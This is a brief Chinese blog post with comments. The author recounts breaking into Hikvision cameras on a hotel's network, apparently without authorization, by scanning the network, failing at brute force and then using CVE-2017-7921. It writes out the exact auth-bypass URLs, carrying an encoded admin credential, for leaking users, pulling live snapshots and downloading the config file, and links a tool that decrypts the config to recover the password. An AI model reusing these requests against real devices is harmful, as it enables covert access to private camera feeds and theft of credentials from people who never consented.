一次hotel "fuck" 摄像头

FishM4n 2020-08-07 PM 1139℃ 3条

最近出去H V V,在酒店闲(tou)暇(lan)期间随手搞了搞摄像头。

首先
基操,,直接开扫,,发现好几个

然后
访问https://192.168.x.x/
一顿瞎🐔吧爆破弱口令 无果

再然后
这时候祭出神器 百度一下 ,百度告诉我有个CVE-2017-7921😮 那就试试

访问泄露信息:https://192.168.x.x/Security/users?auth=YWRtaW46MTEK

访问泄露快照:https://192.168.x.x/onvif-http/snapshot?auth=YWRtaW46MTEK
每刷新一下截取一次快照

访问会down一个配置文件:https://192.168.x.x/System/configurationFile?auth=YWRtaW46MTEK

文件通过工具解密后会拿到密码😏
工具链接:https://github.com/WormChickenWizard/hikvision-decrypter
通过巴拉巴拉解密后 耶嗨,密码就出来了

再再然后
嘿嘿嘿🚫溜了溜了

标签: Hikvision, CVE-2017-7921

非特殊说明,本博所有文章均为博主原创。

评论啦~



已有 3 条评论


  1. Reluctantly
    Reluctantly

    你好,请问一下,你那个反向解密的软件是那个软件?

    回复 2020-11-21 12:30
    1. FishMan
      FishMan 博主

      https://github.com/WormChickenWizard/hikvision-decrypter

      回复 2020-11-21 16:51
      1. Reluctantly
        Reluctantly

        多谢

        回复 2020-11-21 16:53